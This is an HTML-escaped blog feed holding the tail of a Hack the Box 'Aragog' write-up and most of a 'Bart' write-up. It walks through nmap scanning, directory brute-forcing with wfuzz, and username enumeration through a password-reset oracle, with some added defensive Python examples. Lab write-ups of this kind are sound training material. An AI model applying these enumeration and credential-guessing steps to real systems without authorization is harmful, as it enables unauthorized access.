    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;post&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;wp_login&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;headers&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;headers1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;datas&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;resp&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;wp_admin&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;resp&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;text&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;That’s all for now folks.&lt;/p&gt;</content><author><name>A Medic (@OnlyaMedic)</name></author><category term="writeup" /><category term="pentesting" /><category term="hackthebox" /><category term="web" /><category term="xxe" /><category term="wordpress-backdoor" /><summary type="html">Introduction Nmap BurpSuite GoBuster Pspy Enumeration Initial Scanning Like with every hack the box machine lets begin with an nmap scan against aragog (10.10.10.78)</summary></entry><entry><title type="html">Hack the Box - Bart Write up</title><link href="https://dastinia.io/write-up/hackthebox/2018/07/14/hackthebox-bart/" rel="alternate" type="text/html" title="Hack the Box - Bart Write up" /><published>2018-07-14T00:00:00-04:00</published><updated>2018-07-14T00:00:00-04:00</updated><id>https://dastinia.io/write-up/hackthebox/2018/07/14/hackthebox-bart</id><content type="html" xml:base="https://dastinia.io/write-up/hackthebox/2018/07/14/hackthebox-bart/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://dastinia.io/assets/images/htb/bart/1.png&quot; alt=&quot;Bart&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;I felt like Bart was a pretty good box. It’s extremely similar to some of the boxes in the OSCP labs, and the avenue used to get code execution I’ve already seen at least twice so far. If you are taking the OSCP (I currently am) I highly recommend going through the motions of this box because Bart is a prime example of a potential box you would get, with very similar attack vectors that you need to be able to exploit. I plan on editing this write-up a bit later to include how to complete this box without the use of Metasploit, but only after I get some sleep since I’ve been up all night. Sorry in advance if there are any quality control mistakes, it’s too early for me.&lt;/p&gt;

&lt;h2 id=&quot;tools-used&quot;&gt;Tools Used&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://nmap.org/&quot;&gt;Nmap&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://portswigger.net/&quot;&gt;BurpSuite&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/OJ/gobuster&quot;&gt;GoBuster&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://nmap.org/ncat/&quot;&gt;Ncat&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/rapid7/metasploit-framework&quot;&gt;Metasploit Framework&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/xmendez/wfuzz&quot;&gt;WFuzz&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://eternallybored.org/misc/netcat/&quot;&gt;Netcat (64bit)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/CoreSecurity/impacket&quot;&gt;Impacket&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;enumeration&quot;&gt;Enumeration&lt;/h2&gt;
&lt;h3 id=&quot;initial-scanning&quot;&gt;Initial Scanning&lt;/h3&gt;

&lt;p&gt;As with every Hack the Box machine, let’s begin with an nmap scan against Bart (10.10.10.81)&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/bart# nmap -sV -sC 10.10.10.81 -oA nmap/bart_initscan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-11 21:17 EDT
Nmap scan report for 10.10.10.81
Host is up (0.18s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://forum.bart.htb/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.00 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;We see that the only available service is the IIS web service running on port 80. We can also determine from the IIS 10 http header that this is likely a &lt;a href=&quot;https://docs.microsoft.com/en-us/iis/get-started/whats-new-in-iis-10/new-features-introduced-in-iis-10&quot;&gt;windows server 2016 or windows 10&lt;/a&gt; system running under the hood.&lt;/p&gt;

&lt;h3 id=&quot;enumeration-port-80-forumbarthtb-wordpress&quot;&gt;Enumeration Port 80 (forum.bart.htb (wordpress))&lt;/h3&gt;

&lt;p&gt;From our nmap scan we can see that we are being redirected automatically to &lt;code class=&quot;highlighter-rouge&quot;&gt;forum.bart.htb&lt;/code&gt;. Since HTB doesn’t have global DNS, we aren’t going to be able to resolve the site. We can add entries to our &lt;code class=&quot;highlighter-rouge&quot;&gt;/etc/hosts&lt;/code&gt; file to point both &lt;code class=&quot;highlighter-rouge&quot;&gt;bart.htb&lt;/code&gt; and &lt;code class=&quot;highlighter-rouge&quot;&gt;forum.bart.htb&lt;/code&gt; to &lt;code class=&quot;highlighter-rouge&quot;&gt;10.10.10.81&lt;/code&gt;. &lt;a href=&quot;https://askubuntu.com/questions/183176/what-is-the-use-of-etc-hosts&quot;&gt;Reference&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;adding the /etc/hosts entry&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/bart# echo &quot;10.10.10.81 forum.bart.htb&quot; &amp;gt;&amp;gt; /etc/hosts
root@dastinia:~/htb/bart# echo &quot;10.10.10.81 bart.htb&quot; &amp;gt;&amp;gt; /etc/hosts
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Visiting forum.bart.htb in a browser brings us to a snazzy SPA Wordpress site.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/bart/2.png&quot; alt=&quot;&amp;quot;Homepage of forum.bart.htb&amp;quot;&quot; title=&quot;Homepage of forum.bart.htb&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Attempting to access the WordPress login page results in an error: &lt;code class=&quot;highlighter-rouge&quot;&gt;&quot;The page cannot be displayed because an internal server error has occurred.&quot;&lt;/code&gt; This is strange because there’s not much else going on with the site. This is likely some sort of rabbit hole.&lt;/p&gt;

&lt;p&gt;Running gobuster on &lt;code class=&quot;highlighter-rouge&quot;&gt;forum.bart.htb&lt;/code&gt; doesn’t reveal anything especially interesting. Thinking that maybe there is some hidden content on the site, we mirror the site with wget and search for interesting content like emails, extra domain names, or hidden pages.&lt;/p&gt;

&lt;p&gt;We were able to discover a few potential emails/usernames, but nothing that stood out immediately. We did notice that the Bart developer &lt;code class=&quot;highlighter-rouge&quot;&gt;Harvey Potter&lt;/code&gt; (&lt;em&gt;h.potter@bart.htb&lt;/em&gt;) is the only member of the team not displayed on the main site, but whose information is stored in a comment on the page.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;mirroring site locally&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/bart/bart_wpsite# wget -r http://forum.bart.htb
root@dastinia:~/htb/bart/bart_wpsite# grep -RiP &quot;bart&quot; forum.bart.htb/
forum.bart.htb/index.html:&amp;lt;title&amp;gt;BART&amp;lt;/title&amp;gt;
forum.bart.htb/index.html:&amp;lt;link rel='stylesheet' id='sydney-ie9-css'  href='http://forum.bart.htb/wp-content/themes/sydney/css/ie9.css?ver=4.8.2' type='text/css' media='all' /&amp;gt;
forum.bart.htb/index.html:                                                      &amp;lt;h1 class=&quot;site-title&quot;&amp;gt;&amp;lt;a href=&quot;#&quot; rel=&quot;home&quot;&amp;gt;BART&amp;lt;/a&amp;gt;&amp;lt;/h1&amp;gt;
forum.bart.htb/index.html:                                                                                                                                                              &amp;lt;div class=&quot;pos&quot;&amp;gt;CEO@BART&amp;lt;/div&amp;gt;
forum.bart.htb/index.html:                                                                                                                                                                      &amp;lt;li&amp;gt;&amp;lt;a class=&quot;mail&quot; href=&quot;mailto:s.brown@bart.local&quot; target=&quot;_blank&quot;&amp;gt;&amp;lt;i class=&quot;fa&quot;&amp;gt;M&amp;lt;/i&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
forum.bart.htb/index.html:                                                                                                                                              &amp;lt;div class=&quot;pos&quot;&amp;gt;CEO@BART&amp;lt;/div&amp;gt;
forum.bart.htb/index.html:                                                                                                                                                                      &amp;lt;li&amp;gt;&amp;lt;a class=&quot;mail&quot; href=&quot;mailto:d.simmons@bart.htb&quot; target=&quot;_blank&quot;&amp;gt;&amp;lt;i class=&quot;fa&quot;&amp;gt;M&amp;lt;/i&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
forum.bart.htb/index.html:                                                                                                                                                                      &amp;lt;li&amp;gt;&amp;lt;a class=&quot;mail&quot; href=&quot;mailto:r.hilton@bart.htb&quot; target=&quot;_blank&quot;&amp;gt;&amp;lt;i class=&quot;fa&quot;&amp;gt;M&amp;lt;/i&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
forum.bart.htb/index.html:                                                                                                                                                                              &amp;lt;div class=&quot;pos&quot;&amp;gt;Developer@BART&amp;lt;/div&amp;gt;
forum.bart.htb/index.html:                                                                                                                                                                                      &amp;lt;li&amp;gt;&amp;lt;a class=&quot;mail&quot; href=&quot;mailto:h.potter@bart.htb&quot; target=&quot;_blank&quot;&amp;gt;&amp;lt;i class=&quot;fa&quot;&amp;gt;M&amp;lt;/i&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
forum.bart.htb/index.html:                                                                                                                                                    
...[snip]...
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;a better grep to extract email addresses&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/bart/bart_wpsite# grep -RiE -o &quot;\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b&quot;
forum.bart.htb/index.html:s.brown@bart.local
forum.bart.htb/index.html:d.simmons@bart.htb
forum.bart.htb/index.html:r.hilton@bart.htb
forum.bart.htb/index.html:h.potter@bart.htb
forum.bart.htb/index.html:info@bart.htb
forum.bart.htb/index.html:info@bart.htb
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h3 id=&quot;discovering-monitoring-portal-with-wfuzz&quot;&gt;Discovering Monitoring Portal with Wfuzz&lt;/h3&gt;

&lt;p&gt;Taking a step back and attempting to enumerate the root of the domain, &lt;code class=&quot;highlighter-rouge&quot;&gt;bart.htb&lt;/code&gt;, with &lt;code class=&quot;highlighter-rouge&quot;&gt;gobuster&lt;/code&gt;, you discover that the site seems to be returning some kind of content on every request.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;gobuster on bart.htb&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/bart# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://bart.htb/ -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_bart

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://bart.htb/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,403,200
[+] Extensions   : .php,.html
=====================================================
/index (Status: 200)
/news (Status: 200)
/crack (Status: 200)
/download (Status: 200)
/2006 (Status: 200)
/images (Status: 200)
/serial (Status: 200)
/warez (Status: 200)
/full (Status: 200)
/12 (Status: 200)
/contact (Status: 200)
/about (Status: 200)
/search (Status: 200)
/spacer (Status: 200)
/logo (Status: 200)
/privacy (Status: 200)
/11 (Status: 200)
/new (Status: 200)
/blog (Status: 200)
/rss (Status: 200)
/home (Status: 200)
/faq (Status: 200)
/cgi-bin (Status: 200)
/10 (Status: 200)
/archives (Status: 200)
/products (Status: 200)
/sitemap (Status: 200)
/default (Status: 200)
/img (Status: 200)
/2005 (Status: 200)
/1 (Status: 200)
/09 (Status: 200)
/links (Status: 200)
/01 (Status: 200)
/08 (Status: 200)
/06 (Status: 200)
/2 (Status: 200)
/07 (Status: 200)
/articles (Status: 200)
/login (Status: 200)
/keygen (Status: 200)
/article (Status: 200)
...[snip]...
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Visiting the page in a browser you see that every path you attempt to go to returns the same error page, with a 200 status rather than a 404. This is pretty common in modern web applications: a custom error page is returned instead of a standard 404 response stating that something was wrong.&lt;/p&gt;

&lt;p&gt;This renders tools like &lt;em&gt;gobuster, dirb or dirbuster&lt;/em&gt; basically useless for gathering information, since the results will be filled with false positives or will require additional post-processing to figure out what’s actually real.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/bart/3.png&quot; alt=&quot;&amp;quot;Error Page Returned&amp;quot;&quot; title=&quot;Error Page Returned&quot; /&gt;&lt;/p&gt;

&lt;p&gt;To circumvent this we can use &lt;code class=&quot;highlighter-rouge&quot;&gt;wfuzz&lt;/code&gt; as our directory brute forcer and filter the results based on a character-count baseline.
As you can see below, wfuzz reports the error page as having &lt;code class=&quot;highlighter-rouge&quot;&gt;158607&lt;/code&gt; characters in the response. We can use this as our baseline and hide every response of &lt;code class=&quot;highlighter-rouge&quot;&gt;158607 Ch&lt;/code&gt; with the &lt;code class=&quot;highlighter-rouge&quot;&gt;--hh&lt;/code&gt; flag, which leaves only the pages with different (unique) content.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer                         *
********************************************************

Target: http://bart.htb/FUZZ/
Total requests: 220560

==================================================================
ID      Response   Lines      Word         Chars          Payload
==================================================================

000001:  C=302      0 L        0 W            0 Ch        &quot;# directory-list-2.3-medium.txt&quot;
000002:  C=302      0 L        0 W            0 Ch        &quot;#&quot;
000009:  C=302      0 L        0 W            0 Ch        &quot;# Suite 300, San Francisco, California, 94105, USA.&quot;
000003:  C=302      0 L        0 W            0 Ch        &quot;# Copyright 2007 James Fisher&quot;
000004:  C=302      0 L        0 W            0 Ch        &quot;#&quot;
000005:  C=302      0 L        0 W            0 Ch        &quot;# This work is licensed under the Creative Commons&quot;
000016:  C=200    630 L     3775 W        158607 Ch       &quot;images&quot;
000018:  C=200    630 L     3775 W        158607 Ch       &quot;2006&quot;
000017:  C=200    630 L     3775 W        158607 Ch       &quot;download&quot;
000026:  C=200    630 L     3775 W        158607 Ch       &quot;about&quot;
000021:  C=200    630 L     3775 W        158607 Ch       &quot;serial&quot;
000025:  C=200    630 L     3775 W        158607 Ch       &quot;contact&quot;
000027:  C=200    630 L     3775 W        158607 Ch       &quot;search&quot;
000028:  C=200    630 L     3775 W        158607 Ch       &quot;spacer&quot;
000022:  C=200    630 L     3775 W        158607 Ch       &quot;warez&quot;
000023:  C=200    630 L     3775 W        158607 Ch       &quot;full&quot;
000019:  C=200    630 L     3775 W        158607 Ch       &quot;news&quot;
000024:  C=200    630 L     3775 W        158607 Ch       &quot;12&quot;
000032:  C=200    630 L     3775 W        158607 Ch       &quot;blog&quot;
000029:  C=200    630 L     3775 W        158607 Ch       &quot;privacy&quot;
000034:  C=200    630 L     3775 W        158607 Ch       &quot;10&quot;
000073:  C=200    630 L     3775 W        158607 Ch       &quot;category&quot;
000031:  C=200    630 L     3775 W        158607 Ch       &quot;logo&quot;
000080:  C=200    630 L     3775 W        158607 Ch       &quot;media&quot;
000075:  C=200    630 L     3775 W        158607 Ch       &quot;content&quot;
000033:  C=200    630 L     3775 W        158607 Ch       &quot;new&quot;
000079:  C=200    630 L     3775 W        158607 Ch       &quot;press&quot;
000076:  C=200    630 L     3775 W        158607 Ch       &quot;14&quot;
000083:  C=200    630 L     3775 W        158607 Ch       &quot;icons&quot;
000081:  C=200    630 L     3775 W        158607 Ch       &quot;templates&quot;
000082:  C=200    630 L     3775 W        158607 Ch       &quot;services&quot;
000020:  C=200    630 L     3775 W        158607 Ch       &quot;crack&quot;
000030:  C=200    630 L     3775 W        158607 Ch       &quot;11&quot;
000035:  C=200    630 L     3775 W        158607 Ch       &quot;cgi-bin&quot;
000077:  C=200    630 L     3775 W        158607 Ch       &quot;main&quot;

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;Using Wfuzz to hide the error page responses&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/ --hh 158607

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer                         *
********************************************************

Target: http://bart.htb/FUZZ/
Total requests: 220560

==================================================================
ID      Response   Lines      Word         Chars          Payload
==================================================================

000014:  C=302      0 L        0 W            0 Ch        &quot;&quot;
000067:  C=200    548 L     2412 W        35529 Ch        &quot;forum&quot;
001614:  C=200     80 L      221 W         3423 Ch        &quot;monitor&quot;
002385:  C=200    548 L     2412 W        35529 Ch        &quot;Forum&quot;
019837:  C=200     80 L      221 W         3423 Ch        &quot;Monitor&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;From our results we can see that there’s content being served from the &lt;em&gt;“forum”&lt;/em&gt; and &lt;em&gt;“monitor”&lt;/em&gt; directories, with the forum being &lt;code class=&quot;highlighter-rouge&quot;&gt;forum.bart.htb&lt;/code&gt;.&lt;/p&gt;
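A small Python model of the baseline filtering above, added here as an example and not code from wfuzz or from the original write-up. Rather than reading the character count off a first run, it requests a few random paths that cannot exist, takes the most common (status, length) pair as the soft-404 signature, and hides every result that matches it. The `fetch` function and the response sizes in `_CATALOGUE` are a constructed stand-in for bart.htb (padded to the counts wfuzz reported), so the script runs offline; a real run would issue HTTP requests in its place.

```python
"""Baseline-based filtering of directory brute-force results.

Added example modelling wfuzz's --hh filter (not code from wfuzz or the
write-up). The "not found" signature is learned from paths that cannot
exist, then everything matching it is dropped from the wordlist results.
"""
import secrets
from collections import Counter

# Constructed stand-in for http://bart.htb/: an empty path that redirects,
# two real directories, and a catch-all 200 error page for everything else.
# Bodies are padded to the character counts wfuzz showed above.
_ERROR_PAGE = "<html>" + "x" * 158_594 + "</html>"          # 158607 chars
_CATALOGUE = {
    "": (302, ""),
    "forum": (200, "<html>" + "f" * 35_516 + "</html>"),    # 35529 chars
    "monitor": (200, "<html>" + "m" * 3_410 + "</html>"),   #  3423 chars
}


def fetch(path):
    """Return (status, body length) for a path, like wfuzz's C= and Ch
    columns. Constructed stand-in for an HTTP request."""
    status, body = _CATALOGUE.get(path, (200, _ERROR_PAGE))
    return status, len(body)


def learn_baseline(fetch, samples=5):
    """Request random names that cannot exist on the server and return the
    most common (status, length) pair as the soft-404 signature."""
    seen = Counter(fetch(secrets.token_hex(8)) for _ in range(samples))
    return seen.most_common(1)[0][0]


def filter_hits(fetch, wordlist, baseline):
    """Keep only entries whose response differs from the baseline; this is
    what wfuzz --hh <chars> does once the count has been read off one run."""
    hits = []
    for word in wordlist:
        status, length = fetch(word)
        if (status, length) != baseline:
            hits.append((word, status, length))
    return hits


if __name__ == "__main__":
    base = learn_baseline(fetch)
    print("baseline:", base)
    for hit in filter_hits(fetch, ["images", "2006", "forum", "monitor", "", "cgi-bin"], base):
        print(hit)
```

Comparing on length alone is brittle when the error page echoes the requested path back, since the length then varies with the word; comparing on line or word counts instead (wfuzz's `--hl` and `--hw`) or on a similarity threshold is the usual next step.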

&lt;h3 id=&quot;monitorbarthtb&quot;&gt;monitor.bart.htb&lt;/h3&gt;

&lt;p&gt;Visiting &lt;code class=&quot;highlighter-rouge&quot;&gt;monitor.bart.htb&lt;/code&gt; in our browser reveals the application “&lt;a href=&quot;http://www.phpservermonitor.org/&quot;&gt;PHP Server Monitor v3.2.1&lt;/a&gt;”.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/bart/4.png&quot; alt=&quot;&amp;quot;Monitoring Application&amp;quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;After trying the usual Hack the Box username:password combinations with no luck, we begin looking for another avenue into this application. PHP Server Monitor has a password reset function which only takes a username. When you attempt a password reset for a user that doesn’t exist you get the following error.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/bart/5.png&quot; alt=&quot;&amp;quot;Forgot my password -- fail&amp;quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;With this knowledge we can attempt to enumerate usernames in a targeted manner using the information gathered from &lt;code class=&quot;highlighter-rouge&quot;&gt;forum.bart.htb&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;I compiled a short list of possible user names from the site:&lt;/p&gt;

&lt;p&gt;&lt;em&gt;potential usernames compiled from forum.bart.htb&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/bart# cat names.txt
s.brown@bart.local
d.simmons@bart.htb
r.hilton@bart.htb
h.potter@bart.htb
info@bart.htb
s.brown
d.simmons
r.hilton
h.potter
info
samantha
brown
daniel
simmons
robert
hilton
harvey
potter
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;We can use &lt;a href=&quot;https://portswigger.net/burp/help/intruder_gettingstarted&quot;&gt;burpsuite intruder&lt;/a&gt; coupled with the simple list payload to perform this attack.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/bart/12.png&quot; alt=&quot;&amp;quot;Burpsuite Simple List Payload&amp;quot;&quot; title=&quot;Burpsuite Simple List Payload&quot; /&gt;&lt;/p&gt;

&lt;p&gt;This is how we can set up burpsuite intruder to perform our attack.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/bart/17.png&quot; alt=&quot;&amp;quot;Setting up burp suite intruder&amp;quot;&quot; title=&quot;Setting up burp suite intruder&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/bart/18.png&quot; alt=&quot;&amp;quot;Intruder Results&amp;quot;&quot; title=&quot;Intruder results&quot; /&gt;&lt;/p&gt;

&lt;p&gt;From the results of our intruder attack we see that we have two valid usernames, &lt;code class=&quot;highlighter-rouge&quot;&gt;harvey&lt;/code&gt; and &lt;code class=&quot;highlighter-rouge&quot;&gt;daniel&lt;/code&gt;.&lt;/p&gt;
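The reason the Intruder run above works is that the reset endpoint answers differently for known and unknown names. The following is an added example, not code from PHP Server Monitor or from the write-up: a reset handler that mirrors that behaviour over a constructed user table, the hardened form that returns one message for every input, and the audit check a reviewer can run against either. The user table, the message strings and the `outbox` list are assumptions made for the example.

```python
"""Password-reset handlers that do and do not act as a username oracle.

Added example (not code from PHP Server Monitor or the write-up). Both
handlers look a username up in a constructed table and "send" mail by
appending to an outbox list; the audit helper compares responses.
"""

# Constructed user table; the addresses are the ones collected above.
USERS = {
    "harvey": "h.potter@bart.htb",
    "daniel": "d.simmons@bart.htb",
}


def reset_vulnerable(username, outbox):
    """Mirrors the behaviour abused above: an unknown name gets a distinct
    error, so the response alone reveals which accounts exist."""
    if username not in USERS:
        return "Unable to find user with username " + username
    outbox.append(USERS[username])
    return "A password reset link has been sent"


def reset_hardened(username, outbox):
    """Same message for every input; mail is still only sent when the
    account is real, so legitimate users lose nothing."""
    address = USERS.get(username)
    if address is not None:
        outbox.append(address)
    return "If that account exists, a password reset link has been sent"


def is_existence_oracle(handler, known, unknown):
    """Audit check: does the endpoint answer a known and an unknown username
    differently? True means it can be used to enumerate accounts."""
    return handler(known, []) != handler(unknown, [])


if __name__ == "__main__":
    for handler in (reset_vulnerable, reset_hardened):
        print(handler.__name__, "leaks existence:",
              is_existence_oracle(handler, "harvey", "nobody"))
```

Equalising the message is necessary but not sufficient: if the real path sends mail synchronously, the response time still differs, so the mail should be queued (or equivalent work done on the unknown path), and per-IP rate limiting on the endpoint makes a wordlist run like the one above both slower and visible in the logs.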

&lt;p&gt;After some educated guessing you will discover a valid username:password combination of &lt;code class=&quot;highlighter-rouge&quot;&gt;harvey:potter&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;When you attempt to authenticate you are redirected to &lt;code class=&quot;highlighter-rouge&quot;&gt;monitor.bart.htb&lt;/code&gt;, which fails to resolve just like the forum did. We add &lt;code class=&quot;highlighter-rouge&quot;&gt;monitor.bart.htb&lt;/code&gt; to our &lt;code class=&quot;highlighter-rouge&quot;&gt;/etc/hosts&lt;/code&gt; file and attempt to re-authenticate with our newly found credentials.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~# echo &quot;10.10.10.81 monitor.bart.htb &quot; &amp;gt;&amp;gt; /etc/hosts
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;After we re-authenticate we are greeted with the following page.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/bart/8.png&quot; alt=&quot;&amp;quot;Authenticating to Server Monitor&amp;quot;&quot; title=&quot;Authenticating to Server Monitor&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Browsing around you see there is an entry for the “Internal Chat” service.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/bart/9.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Viewing the details of “Internal Chat” reveals that there is another application on a different domain, &lt;em&gt;“internal-01.bart.htb”&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/bart/10.png&quot; alt=&quot;&amp;quot;Discovering internal-01.bart.htb&amp;quot;&quot; title=&quot;Discovering internal-01.bart.htb&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;exploitation&quot;&gt;Exploitation&lt;/h2&gt;
&lt;h3 id=&quot;simple-chat-source-code-discovery--account-registration&quot;&gt;Simple Chat Source Code Discovery &amp;amp; Account Registration&lt;/h3&gt;

&lt;p&gt;Visiting &lt;code class=&quot;highlighter-rouge&quot;&gt;internal-01.bart.htb&lt;/code&gt; in our browser reveals the login page of Bart’s internal “dev chat”.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/bart/19.png&quot; alt=&quot;&amp;quot;Dev chat internal login page&amp;quot;&quot; title=&quot;Dev chat internal login page&quot; /&gt;&lt;/p&gt;

